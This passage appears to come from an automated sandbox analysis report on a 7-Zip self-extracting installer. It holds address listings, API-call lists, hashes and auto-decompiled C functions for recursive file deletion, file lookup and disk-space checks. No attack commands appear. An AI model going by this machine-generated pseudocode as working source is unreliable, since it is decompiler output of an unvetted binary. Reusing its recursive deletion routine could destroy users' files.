                                          0x004068d8
                                          0x004068df
                                          0x004068e4
                                          0x004068e6
                                          0x004068e8
                                          0x004068ec
                                          0x004068f2
                                          0x004068f2
                                          0x004068fa
                                          0x00406910
                                          0x0040691a
                                          0x0040692c
                                          0x00000000
                                          0x0040692c
                                          0x004068d6
                                          0x0040687d
                                          0x00406884
                                          0x0040688c
                                          0x00406890
                                          0x00406895
                                          0x00406898
                                          0x00406898
                                          0x00406898
                                          0x0040689b
                                          0x004068a6
                                          0x004068a6
                                          0x00000000
                                          0x004068b1
                                          0x00406715
                                          0x0040671c
                                          0x00000000
                                          0x00000000
                                          0x00406722
                                          0x00406727
                                          0x00406729
                                          0x00000000
                                          0x00000000
                                          0x0040673a
                                          0x00406753
                                          0x00406790
                                          0x004067a9
                                          0x004067ae
                                          0x004067b1
                                          0x004067b6
                                          0x004067b9
                                          0x004067be
                                          0x004067c4
                                          0x004067c9
                                          0x004067cc
                                          0x004067d1
                                          0x004067d4
                                          0x004067d9
                                          0x004067e7
                                          0x004067f0
                                          0x004067f3
                                          0x004067f4
                                          0x004067f9
                                          0x004067fc
                                          0x004067fe
                                          0x00406827
                                          0x0040682c
                                          0x0040682f
                                          0x00406834
                                          0x00406837
                                          0x0040683c
                                          0x0040683f
                                          0x00406844
                                          0x00000000
                                          0x00406844
                                          0x00406800
                                          0x00406805
                                          0x00406808
                                          0x0040680d
                                          0x00406810
                                          0x00406815
                                          0x00406818
                                          0x0040681d
                                          0x00406820
                                          0x00000000
                                          0x00406820
                                          0x004065f6
                                          0x0040660d
                                          0x0040661e
                                          0x00406625
                                          0x00406631
                                          0x00406631
                                          0x00406633
                                          0x00406634
                                          0x00406634
                                          0x00406636
                                          0x00406636
                                          0x00406644
                                          0x00406646
                                          0x00406647
                                          0x00406647
                                          0x0040664c
                                          0x0040664e
                                          0x0040664e
                                          0x00406650
                                          0x00406652
                                          0x00406653
                                          0x0040665b
                                          0x00406665
                                          0x00406665
                                          0x0040666b
                                          0x00406671
                                          0x00406671
                                          0x00406671
                                          0x00406674
                                          0x00406677
                                          0x00406679
                                          0x0040667f
                                          0x00406680
                                          0x00406681
                                          0x00406683
                                          0x00406685
                                          0x00406689
                                          0x0040668a
                                          0x00406692
                                          0x00406692
                                          0x00406692
                                          0x00406685
                                          0x0040669c
                                          0x004066a4
                                          0x004066a7
                                          0x004066a8
                                          0x004066a8
                                          0x004066ad
                                          0x004066af
                                          0x004066c3
                                          0x004066c8
                                          0x004066cf
                                          0x00000000
                                          0x004066cf
                                          0x004065c5
                                          0x004065c8
                                          0x004065ce
                                          0x00000000
                                          0x004065ce
                                          0x004064f6
                                          0x004064fd
                                          0x00406502
                                          0x00406504
                                          0x00000000
                                          0x00000000
                                          0x00406506
                                          0x0040650a
                                          0x0040650c
                                          0x0040650c
                                          0x0040650c
                                          0x0040650f
                                          0x00406512
                                          0x00406515
                                          0x00000000
                                          0x0040651b
                                          0x0040651b
                                          0x0040651b
                                          0x0040651f
                                          0x00000000
                                          0x00000000
                                          0x00406521
                                          0x00406524
                                          0x00406527
                                          0x0040652a
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040652a
                                          0x0040652c
                                          0x00406530
                                          0x00000000
                                          0x00000000
                                          0x00406536
                                          0x0040653b
                                          0x00406540
                                          0x00406542
                                          0x00000000
                                          0x00000000
                                          0x00406548
                                          0x0040654a
                                          0x0040654c
                                          0x00406551
                                          0x00406554
                                          0x00406559
                                          0x0040655c
                                          0x00000000
                                          0x0040655c
                                          0x00406515
                                          0x004064e0
                                          0x004064e0
                                          0x004064e3
                                          0x00000000
                                          0x0040649e
                                          0x004064a8
                                          0x004064ad
                                          0x004064b0
                                          0x00406238
                                          0x00406238
                                          0x00000000
                                          0x00406238
                                          0x0040649c
                                          0x00406230
                                          0x00406234
                                          0x0040623e
                                          0x00406246
                                          0x00406249
                                          0x00406249
                                          0x0040624c
                                          0x00406350
                                          0x0040635f
                                          0x0040635f
                                          0x0040635f
                                          0x00406362
                                          0x00000000
                                          0x00000000
                                          0x0040635c
                                          0x0040635c
                                          0x0040635c
                                          0x00406364
                                          0x0040636b
                                          0x0040636d
                                          0x00406372
                                          0x00406374
                                          0x00000000
                                          0x00000000
                                          0x00406376
                                          0x0040637a
                                          0x00406387
                                          0x00406387
                                          0x0040638a
                                          0x0040638d
                                          0x0040637e
                                          0x00406382
                                          0x00000000
                                          0x00000000
                                          0x00406384
                                          0x00406384
                                          0x00406384
                                          0x00000000
                                          0x00406384
                                          0x0040638f
                                          0x00406392
                                          0x00406398
                                          0x0040639b
                                          0x004063a0
                                          0x004063a5
                                          0x004063ac
                                          0x004063ae
                                          0x004063b6
                                          0x004063b6
                                          0x00000000
                                          0x004063ae
                                          0x00000000
                                          0x0040637c
                                          0x00406253
                                          0x00406253
                                          0x00406254
                                          0x0040633e
                                          0x00406349
                                          0x00000000
                                          0x00406349
                                          0x0040625a
                                          0x0040625a
                                          0x0040625b
                                          0x004062b9
                                          0x004062bc
                                          0x004062fb
                                          0x004062fb
                                          0x004062fe
                                          0x004062fe
                                          0x00406305
                                          0x00406309
                                          0x00406326
                                          0x00406326
                                          0x00406330
                                          0x00406330
                                          0x00000000
                                          0x00406330
                                          0x0040630b
                                          0x0040630b
                                          0x0040630f
                                          0x00406316
                                          0x0040631b
                                          0x00406320
                                          0x00000000
                                          0x00000000
                                          0x00406322
                                          0x00406324
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406324
                                          0x004062be
                                          0x004062c3
                                          0x00000000
                                          0x00000000
                                          0x004062c9
                                          0x004062e5
                                          0x004062e5
                                          0x004062e8
                                          0x004062eb
                                          0x00000000
                                          0x00000000
                                          0x004062ce
                                          0x004062d2
                                          0x00000000
                                          0x00000000
                                          0x004062dd
                                          0x004062e2
                                          0x004062e2
                                          0x004062e2
                                          0x004062ed
                                          0x004062f4
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004062f6
                                          0x0040625d
                                          0x0040625d
                                          0x00406260
                                          0x00406271
                                          0x00406276
                                          0x00000000
                                          0x00000000
                                          0x00406280
                                          0x00406280
                                          0x00406283
                                          0x004062b3
                                          0x00000000
                                          0x004062b3
                                          0x00406285
                                          0x00406285
                                          0x00406286
                                          0x004062a7
                                          0x00000000
                                          0x004062a7
                                          0x00406288
                                          0x00406288
                                          0x00406289
                                          0x004062a3
                                          0x00000000
                                          0x004062a3
                                          0x0040628b
                                          0x0040628b
                                          0x0040628c
                                          0x00406299
                                          0x00000000
                                          0x00406299
                                          0x0040628e
                                          0x0040628f
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040628f
                                          0x00406262
                                          0x00406265
                                          0x00000000
                                          0x00406267
                                          0x00406267
                                          0x00000000
                                          0x00406267
                                          0x00406265
                                          0x00406236
                                          0x00406236
                                          0x00000000
                                          0x00406201
                                          0x00406203
                                          0x00406203
                                          0x00406204
                                          0x00406206
                                          0x00406207
                                          0x0040620d
                                          0x00000000
                                          0x0040620d
                                          0x004061bc
                                          0x004061c3
                                          0x00000000
                                          0x004061c3
                                          0x00406183
                                          0x00406183
                                          0x00406188
                                          0x00406188
                                          0x0040618a
                                          0x0040618a
                                          0x0040618d
                                          0x00406192
                                          0x00406195
                                          0x0040619a
                                          0x0040619d
                                          0x004061a5
                                          0x0040700a
                                          0x00407011
                                          0x00407011
                                          0x0040614e
                                          0x0040614e
                                          0x00406152
                                          0x00406159
                                          0x00406162
                                          0x00406164
                                          0x00406164
                                          0x0040616a
                                          0x0040616a
                                          0x0040616d
                                          0x00000000
                                          0x0040616a
                                          0x00406146

                                          APIs
                                          • ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z.MSVCRT ref: 00406037
                                            • Part of subcall function 00403834: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00406043,?,00000000), ref: 00403840
                                            • Part of subcall function 00403834: CreateWindowExW.USER32 ref: 0040385D
                                            • Part of subcall function 00403834: GetDesktopWindow.USER32 ref: 00403869
                                            • Part of subcall function 00403834: GetWindowRect.USER32 ref: 00403870
                                            • Part of subcall function 00403834: SetWindowPos.USER32(00000000,00000000,?,00406043,00000000,00000000,00000004), ref: 00403894
                                            • Part of subcall function 00403834: SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 004038A4
                                            • Part of subcall function 00403834: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004038B1
                                            • Part of subcall function 00403834: DispatchMessageW.USER32 ref: 004038BB
                                            • Part of subcall function 00403834: KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,?,?,?,?,00406043,?,00000000), ref: 004038C4
                                          • GetVersionExW.KERNEL32(?,?,00000000), ref: 00406054
                                          • MessageBoxA.USER32 ref: 00407001
                                            • Part of subcall function 004147DF: ??2@YAPAXI@Z.MSVCRT ref: 004147E7
                                            • Part of subcall function 0040541A: LoadLibraryA.KERNEL32(kernel32,?,?,00000000), ref: 0040542B
                                            • Part of subcall function 0040541A: #17.COMCTL32(?,?,00000000), ref: 00405436
                                            • Part of subcall function 0040541A: SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000,?,?,00000000), ref: 004054BB
                                            • Part of subcall function 0040541A: wsprintfW.USER32 ref: 004054CF
                                          • GetCommandLineW.KERNEL32(?,00000000), ref: 004060AD
                                            • Part of subcall function 00414864: ??2@YAPAXI@Z.MSVCRT ref: 00414896
                                            • Part of subcall function 00414864: ??3@YAXPAX@Z.MSVCRT ref: 0041489F
                                            • Part of subcall function 00414864: memcpy.MSVCRT ref: 004148B7
                                            • Part of subcall function 0040457E: ??3@YAXPAX@Z.MSVCRT ref: 004045F1
                                            • Part of subcall function 0040457E: ??3@YAXPAX@Z.MSVCRT ref: 0040460D
                                            • Part of subcall function 0040457E: ??3@YAXPAX@Z.MSVCRT ref: 00404615
                                            • Part of subcall function 0040457E: ??3@YAXPAX@Z.MSVCRT ref: 00404680
                                            • Part of subcall function 00404F69: ??3@YAXPAX@Z.MSVCRT ref: 00404FD0
                                            • Part of subcall function 00404F69: ??3@YAXPAX@Z.MSVCRT ref: 00404FD9
                                            • Part of subcall function 00404F69: ??3@YAXPAX@Z.MSVCRT ref: 00404FE1
                                          • GetCommandLineW.KERNEL32(00000001,00000001,00000001,00000000,?,00000000), ref: 004060F3
                                            • Part of subcall function 0040420B: wcsncpy.MSVCRT ref: 00404239
                                            • Part of subcall function 0040420B: ??3@YAXPAX@Z.MSVCRT ref: 00404244
                                          • wsprintfW.USER32 ref: 00406119
                                            • Part of subcall function 004056BA: lstrlenW.KERNEL32(sfxlang,?,73B749F0,?,00000001,00406144,00000001), ref: 004056FB
                                            • Part of subcall function 004056BA: lstrlenW.KERNEL32(sfxlang), ref: 00405700
                                          • _wtol.MSVCRT(-00000002,00000001), ref: 00406152
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040618D
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00406195
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040619D
                                          • GetModuleFileNameW.KERNEL32(00000000,00000000,00000208,00000208,00000001), ref: 004061F7
                                          • _wtol.MSVCRT(-00000002), ref: 0040630F
                                            • Part of subcall function 004143C2: ??2@YAPAXI@Z.MSVCRT ref: 004143CA
                                            • Part of subcall function 00405319: ??3@YAXPAX@Z.MSVCRT ref: 0040535D
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004064E3
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00406554
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@$Window$??2@Message$CommandLineModuleTimer_wtollstrlenwsprintf$?_set_new_handler@@CreateDesktopDispatchFileFolderHandleKillLibraryLoadNamePathRectSpecialVersionmemcpywcsncpy
                                          • String ID: " -$123456789ABCDEFGHJKMNPQRSTUVWXYZ$7-Zip SFX$7ZipSfx.%03x$AutoInstall$BeginPrompt$BeginPromptTimeout$D(B$D(B$Delete$ExecuteFile$ExecuteOnLoad$FinishMessage$HelpText$InstallPath$P(B$PreExtract$RunProgram$SelfDelete$SetEnvironment$SfxAuthor$SfxString%d$SfxVarApiPath$SfxVarCmdLine0$SfxVarModulePlatform$SfxVarSystemLanguage$SfxVarSystemPlatform$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$X!B$\(B$h(B$setup.exe$sfxconfig$sfxelevation$sfxlang$sfxtest$sfxversion$sfxwaitall$x86
                                          • API String ID: 15977253-1531357413
                                          • Opcode ID: 4cfe7914999c83cdfae56ae628e5975d8e96e37cc82df186b60976c0a51257c0
                                          • Instruction ID: a556a6a5a5f07645b6d0a54752984156d57e7a988d3b1907c5a6a98372b60f7b
                                          • Opcode Fuzzy Hash: 4cfe7914999c83cdfae56ae628e5975d8e96e37cc82df186b60976c0a51257c0
                                          • Instruction Fuzzy Hash: 0C92F470A00215ABDB24BB61DD41BAE3661EF80708F55403FF906B62E2DBBC9C95CB5D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403327, Relevance: 18.1, APIs: 12, Instructions: 91filestringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 95%
                                          			E00403327(WCHAR* __ecx, void* __edx, void* __eflags) {
				WCHAR* _v16;
				void* _v20;
				struct _WIN32_FIND_DATAW _v612;
				void* _t26;
				int _t28;
				int _t29;
				int _t30;
				int _t36;
				int _t37;
				int _t39;
				int _t44;
				WCHAR* _t45;
				void* _t54;

				_t54 = __edx;
				_t45 = __ecx;
				E00414803( &_v16, __ecx);
				E00414922( &_v16, 0x41dbcc);
				_t26 = FindFirstFileW(_v16,  &_v612); // executed
				_v20 = _t26;
				if(_t26 == 0xffffffff) {
					L11:
					SetCurrentDirectoryW( *0x422794);
					_t28 = SetFileAttributesW(_t45, 0); // executed
					if(_t28 == 0) {
						goto L14;
					} else {
						_t30 = RemoveDirectoryW(_t45); // executed
						if(_t30 == 0) {
							goto L14;
						} else {
							_push(_v16);
							L0041C160();
							_t29 = 1;
						}
					}
				} else {
					do {
						E00414864( &_v16, _t45);
						E00401585( &_v16, 0x5c);
						E00414922( &_v16,  &(_v612.cFileName));
						if((_v612.dwFileAttributes & 0x00000010) == 0) {
							_t36 = SetFileAttributesW(_v16, 0); // executed
							__eflags = _t36;
							if(_t36 == 0) {
								goto L14;
							} else {
								_t37 = DeleteFileW(_v16); // executed
								goto L8;
							}
						} else {
							if(lstrcmpW( &(_v612.cFileName), 0x41dbc8) == 0) {
								goto L9;
							} else {
								_t44 = lstrcmpW( &(_v612.cFileName), 0x41dbc0);
								_t61 = _t44;
								if(_t44 == 0) {
									goto L9;
								} else {
									_t37 = E00403327(_v16, _t54, _t61);
									L8:
									if(_t37 == 0) {
										L14:
										_push(_v16);
										L0041C160();
										_t29 = 0;
										__eflags = 0;
									} else {
										goto L9;
									}
								}
							}
						}
						goto L15;
						L9:
						_t39 = FindNextFileW(_v20,  &_v612); // executed
					} while (_t39 != 0);
					FindClose(_v20);
					goto L11;
				}
				L15:
				return _t29;
			}
















                                          0x00403327
                                          0x00403332
                                          0x00403339
                                          0x00403346
                                          0x00403355
                                          0x00403361
                                          0x00403367
                                          0x00403405
                                          0x0040340b
                                          0x00403414
                                          0x00403418
                                          0x00000000
                                          0x0040341a
                                          0x0040341b
                                          0x00403423
                                          0x00000000
                                          0x00403425
                                          0x00403425
                                          0x00403428
                                          0x0040342f
                                          0x0040342f
                                          0x00403423
                                          0x0040336d
                                          0x00403373
                                          0x00403377
                                          0x00403381
                                          0x00403390
                                          0x0040339c
                                          0x004033d1
                                          0x004033d3
                                          0x004033d5
                                          0x00000000
                                          0x004033d7
                                          0x004033da
                                          0x00000000
                                          0x004033da
                                          0x0040339e
                                          0x004033ae
                                          0x00000000
                                          0x004033b0
                                          0x004033bc
                                          0x004033be
                                          0x004033c0
                                          0x00000000
                                          0x004033c2
                                          0x004033c5
                                          0x004033e0
                                          0x004033e2
                                          0x00403432
                                          0x00403432
                                          0x00403435
                                          0x0040343a
                                          0x0040343a
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004033e2
                                          0x004033c0
                                          0x004033ae
                                          0x00000000
                                          0x004033e4
                                          0x004033ee
                                          0x004033f4
                                          0x004033ff
                                          0x00000000
                                          0x004033ff
                                          0x0040343c
                                          0x00403441

                                          APIs
                                            • Part of subcall function 00414803: memcpy.MSVCRT ref: 00414829
                                            • Part of subcall function 00414922: memcpy.MSVCRT ref: 0041494F
                                          • FindFirstFileW.KERNELBASE(?,?,0041DBCC,?,00000000,?,00000000), ref: 00403355
                                          • lstrcmpW.KERNEL32(?,0041DBC8,?,0000005C,?), ref: 004033AA
                                          • lstrcmpW.KERNEL32(?,0041DBC0), ref: 004033BC
                                          • SetFileAttributesW.KERNELBASE(?,00000000,?,0000005C,?), ref: 004033D1
                                          • DeleteFileW.KERNELBASE(?), ref: 004033DA
                                          • FindNextFileW.KERNELBASE(?,00000010), ref: 004033EE
                                          • FindClose.KERNEL32(?), ref: 004033FF
                                          • SetCurrentDirectoryW.KERNEL32 ref: 0040340B
                                          • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00403414
                                          • RemoveDirectoryW.KERNELBASE(?), ref: 0040341B
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00403428
                                            • Part of subcall function 00414864: ??2@YAPAXI@Z.MSVCRT ref: 00414896
                                            • Part of subcall function 00414864: ??3@YAXPAX@Z.MSVCRT ref: 0041489F
                                            • Part of subcall function 00414864: memcpy.MSVCRT ref: 004148B7
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00403435
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: File$??3@Findmemcpy$AttributesDirectorylstrcmp$??2@CloseCurrentDeleteFirstNextRemove
                                          • String ID:
                                          • API String ID: 1254520193-0
                                          • Opcode ID: 4612c2d3c06a1c6854ea9d6cb16b41d3cebbf2c56a804a26a7d40885b9bf0cb1
                                          • Instruction ID: 3c0acd77c11c6bfbf9789e5db0a8688aa55c6e9eafbf1e7d600da6e85a924ae8
                                          • Opcode Fuzzy Hash: 4612c2d3c06a1c6854ea9d6cb16b41d3cebbf2c56a804a26a7d40885b9bf0cb1
                                          • Instruction Fuzzy Hash: 0531A271D00119BADB10AFA1ED85EEF7B7CAF00701F1045B6A412B20E1EB799E00CA18
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404402, Relevance: 6.0, APIs: 4, Instructions: 43fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00404402(WCHAR* __ecx, FILETIME* __edx) {
				struct _WIN32_FIND_DATAW _v596;
				void* _t7;
				signed int _t8;
				intOrPtr _t9;
				FILETIME* _t20;

				_t20 = __edx; // executed
				_t7 = FindFirstFileW(__ecx,  &_v596); // executed
				if(_t7 != 0xffffffff) {
					_t8 = FindClose(_t7); // executed
					if((_v596.dwFileAttributes & 0x00000010) == 0) {
						_t9 =  *0x422778; // 0x2
						if(_t9 != 0) {
							if(_t9 != 2 || CompareFileTime( &(_v596.ftLastWriteTime), _t20) >= 0) {
								return 1;
							} else {
								goto L5;
							}
						}
						L5:
						return E004043D5();
					}
					SetLastError(0x10);
					return _t8 | 0xffffffff;
				}
				return 0;
			}








                                          0x00404417
                                          0x00404419
                                          0x00404422
                                          0x00404429
                                          0x00404436
                                          0x00404445
                                          0x0040444c
                                          0x0040445a
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040445a
                                          0x0040444e
                                          0x00000000
                                          0x00404450
                                          0x0040443a
                                          0x00000000
                                          0x00404440
                                          0x00000000

                                          APIs
                                          • FindFirstFileW.KERNELBASE(00000000,?,00000000,-00000001), ref: 00404419
                                          • FindClose.KERNELBASE(00000000), ref: 00404429
                                          • SetLastError.KERNEL32(00000010), ref: 0040443A
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Find$CloseErrorFileFirstLast
                                          • String ID:
                                          • API String ID: 4020440971-0
                                          • Opcode ID: 1dd38c34050e32057a86cfd6f887252e6440109f0c7138c7ef1928e7de9965fb
                                          • Instruction ID: e28eadc660d29d22e42b67850f94827f0221515ef145fc3d082d2b957231e6be
                                          • Opcode Fuzzy Hash: 1dd38c34050e32057a86cfd6f887252e6440109f0c7138c7ef1928e7de9965fb
                                          • Instruction Fuzzy Hash: CEF0A4F5A0012467DB2027349C4CFAA37ACABC1329F204676EA52F25D0D778C942961E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403442, Relevance: 6.0, APIs: 4, Instructions: 35fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00403442(WCHAR* __ecx) {
				struct _WIN32_FIND_DATAW _v596;
				void* _t5;
				void* _t9;
				int _t10;
				void* _t15;
				WCHAR* _t16;

				_t16 = __ecx;
				if( *0x4228d8 == 0) {
					_t5 = FindFirstFileW(__ecx,  &_v596); // executed
					__eflags = _t5 - 0xffffffff;
					if(_t5 == 0xffffffff) {
						goto L1;
					}
					FindClose(_t5);
					__eflags = _v596.dwFileAttributes & 0x00000010;
					if(__eflags != 0) {
						_t9 = E00403327(_t16, _t15, __eflags); // executed
						return _t9;
					}
					_t10 = SetFileAttributesW(_t16, 0);
					__eflags = _t10;
					if(_t10 == 0) {
						return 0;
					}
					return DeleteFileW(_t16);
				}
				L1:
				return 1;
			}









                                          0x00403453
                                          0x00403455
                                          0x00403464
                                          0x0040346a
                                          0x0040346d
                                          0x00000000
                                          0x00000000
                                          0x00403470
                                          0x00403476
                                          0x0040347d
                                          0x0040349b
                                          0x00000000
                                          0x0040349b
                                          0x00403482
                                          0x00403488
                                          0x0040348a
                                          0x00000000
                                          0x00403495
                                          0x00000000
                                          0x0040348d
                                          0x00403457
                                          0x00000000

                                          APIs
                                          • FindFirstFileW.KERNELBASE(?,?), ref: 00403464
                                          • FindClose.KERNEL32(00000000), ref: 00403470
                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00403482
                                          • DeleteFileW.KERNEL32(?), ref: 0040348D
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: File$Find$AttributesCloseDeleteFirst
                                          • String ID:
                                          • API String ID: 3319113142-0
                                          • Opcode ID: 4bf8c35936a22843f0fe7391aab8452746d3470be5817f0cd1b69b00b5c16dfa
                                          • Instruction ID: 6b212ce663ba0d1f229e145bf37a5fa1ef80438995da8d320f9543b1e0401fa5
                                          • Opcode Fuzzy Hash: 4bf8c35936a22843f0fe7391aab8452746d3470be5817f0cd1b69b00b5c16dfa
                                          • Instruction Fuzzy Hash: ADF05E70A10A14B6CB226F305D4C7AB3EACAB4132BF544576E852F91D0D77C8A4646AE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00409931, Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 94%
                                          			E00409931(void* __eax, WCHAR* _a4, intOrPtr _a8) {
				struct _WIN32_FIND_DATAW _v596;
				void* _t16;
				void* _t18;
				intOrPtr _t36;
				intOrPtr* _t38;

				_push(0x24);
				L0041C16C();
				if(__eax == 0) {
					_t38 = 0;
				} else {
					_t38 = E00415241(__eax);
				}
				if(E0041404F(_a4) != 0) {
					_t36 = _a8;
					E004160A2(_t36, _t38);
					_t16 = FindFirstFileW(_a4,  &_v596); // executed
					if(_t16 == 0xffffffff) {
						if(_t38 != 0) {
							 *((intOrPtr*)( *_t38 + 0x14))(1);
						}
						_t18 = 1;
					} else {
						 *((intOrPtr*)(_t36 + 8)) = _v596.nFileSizeLow;
						 *((intOrPtr*)(_t36 + 0xc)) = _v596.nFileSizeHigh;
						FindClose(_t16); // executed
						_t18 = 0;
					}
					return _t18;
				} else {
					if(_t38 != 0) {
						 *((intOrPtr*)( *_t38 + 0x14))(1);
					}
					return 1;
				}
			}








                                          0x0040993b
                                          0x0040993d
                                          0x00409945
                                          0x00409952
                                          0x00409947
                                          0x0040994e
                                          0x0040994e
                                          0x00409961
                                          0x00409976
                                          0x0040997c
                                          0x0040998b
                                          0x00409994
                                          0x004099b5
                                          0x004099bd
                                          0x004099bd
                                          0x004099c2
                                          0x00409996
                                          0x0040999c
                                          0x004099a6
                                          0x004099a9
                                          0x004099af
                                          0x004099af
                                          0x00000000
                                          0x00409963
                                          0x00409965
                                          0x0040996d
                                          0x0040996d
                                          0x00000000
                                          0x00409972

                                          APIs
                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040993D
                                          • FindFirstFileW.KERNELBASE(004227B8,?,00000000,00000000,004227B8), ref: 0040998B
                                          • FindClose.KERNELBASE(00000000), ref: 004099A9
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Find$??2@CloseFileFirst
                                          • String ID:
                                          • API String ID: 4002974997-0
                                          • Opcode ID: 91c647426eba9d3caa0601590869d6121fa3b5198e89070721a6e1596570726f
                                          • Instruction ID: 04f35bf0448d31e89553be1a3bfedde72a875c1ede13cb4c157a2b7218669a26
                                          • Opcode Fuzzy Hash: 91c647426eba9d3caa0601590869d6121fa3b5198e89070721a6e1596570726f
                                          • Instruction Fuzzy Hash: 62112CB1600111ABCB10AF25CC48AAF7BA4AF48714F00443EF846EB3D2C738DC41CB99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004023DF, Relevance: 3.0, APIs: 2, Instructions: 41windowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 90%
                                          			E004023DF(void* __ecx, void* _a8, intOrPtr _a12) {
				intOrPtr _v8;
				union _ULARGE_INTEGER _v12;
				int _t13;
				WCHAR* _t20;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_push(__ecx);
				if(( *0x422774 & 0x00000001) != 0) {
					L8:
					SendMessageW( *0x4228c4, 0x8001, 0,  &_a8);
					__eflags = 0;
					return 0;
				}
				_t13 = GetDiskFreeSpaceExW( *0x42289c,  &_v12, 0, 0); // executed
				if(_t13 == 0) {
					goto L8;
				}
				_t25 = _v8 - _a12;
				if(_t25 > 0) {
					goto L8;
				}
				if(_t25 < 0) {
					L5:
					_t20 = 0x2a;
					if(E00409617(E00403CE0(_t20), _t22, _t26) == 1) {
						 *0x422774 =  *0x422774 | 0x00000001;
						__eflags =  *0x422774;
						goto L8;
					}
					 *0x422728 = 0x6a;
					return 0x80004005;
				}
				_t26 = _v12.LowPart - _a8;
				if(_v12.LowPart >= _a8) {
					goto L8;
				}
				goto L5;
			}









                                          0x004023e2
                                          0x004023e3
                                          0x004023eb
                                          0x00402443
                                          0x00402454
                                          0x0040245a
                                          0x00000000
                                          0x0040245a
                                          0x004023fb
                                          0x00402403
                                          0x00000000
                                          0x00000000
                                          0x00402408
                                          0x0040240b
                                          0x00000000
                                          0x00000000
                                          0x0040240d
                                          0x00402417
                                          0x00402419
                                          0x00402429
                                          0x0040243c
                                          0x0040243c
                                          0x00000000
                                          0x0040243c
                                          0x0040242b
                                          0x00000000
                                          0x00402435
                                          0x00402412
                                          0x00402415
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          APIs
                                          • GetDiskFreeSpaceExW.KERNELBASE(?,00000000,00000000), ref: 004023FB
                                          • SendMessageW.USER32(00008001,00000000,?), ref: 00402454
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
